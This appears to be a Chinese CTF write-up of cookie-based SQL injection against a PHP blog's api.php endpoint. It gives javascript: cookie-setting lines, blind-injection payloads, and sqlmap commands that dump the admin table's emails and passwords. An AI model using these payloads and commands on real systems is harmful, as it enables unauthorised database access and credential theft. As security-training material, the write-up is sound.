首先拿到题目,先看看他是什么东西写的,如果是java写的那我就自闭,可惜他是php写的
在观察他的题目时候我寻找着看看有什么突破口,这里他不让我使用一些nmap工具(哼不用就不用,不过他这里说不用那就是说题目就是只有这一个端口,其他端口就不必管了给我们减少负担)
然后在他的博客当中,我们进行猴子点点,后面能发现似乎存在一些注入点
进过尝试似乎又一个很麻烦的限制,所以接下来继续找找,这里在bp上面发现了一个api接口
在这个上面,进行尝试,这里呢考点就是Cookie注入,我们将注入点加入Cookie当中尝试看看能否绕过。首先我们打开该界面,我们能看到这里有2条参数
我们将2条参数加入到cookie里面,可直接在网址栏当中输入
javascript:alert(document.cookie="action="+escape("commentcontroller")) javascript:alert(document.cookie="commentid="+escape("1"))
出现该窗口则添加成功,记住2个都要添加
这里可以使用工具进行添加,比如小饼干
这里为了方便,我就把它抓到bp上面进行好操作
接下来进行尝试,这里就不浪费大家时间,union select是失败了,所以采用盲注等
1 and length(database())>=15--+ 成功会显 1 and length(database())>=16--+无内容回显 代表该库名有15位,这里期间,本来是用脚本跑出来数据库,但是看到我SQLmap全部跑出来,那我就恭敬不如从命啦。
看到存在注入点,就直接丢到sqlmap里面一键梭哈、先跑出来看看有哪些数据表
python3 sqlmap.py -u "http://IP/api.php?action=commentcontroller" --batch --cookie "commentid=1" --tables --level 2 -v 3
在进行尝试看看admin表里点字段
python3 sqlmap.py -u "http://IP/api.php?action=commentcontroller" --batch --cookie "commentid=1" --columns -T admin --level 2 -v 3
在进一步获取表内信息
python3 sqlmap.py -u "http://IP/api.php?action=commentcontroller" --batch --cookie "commentid=1" --dump -T admin -C "id,email,password" --level 2 -v 3
待续
小编 | 小铠师傅
原文始发于微信公众号(璇铠安全实验室):学习笔记 | Cookie注入的一套组合拳
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论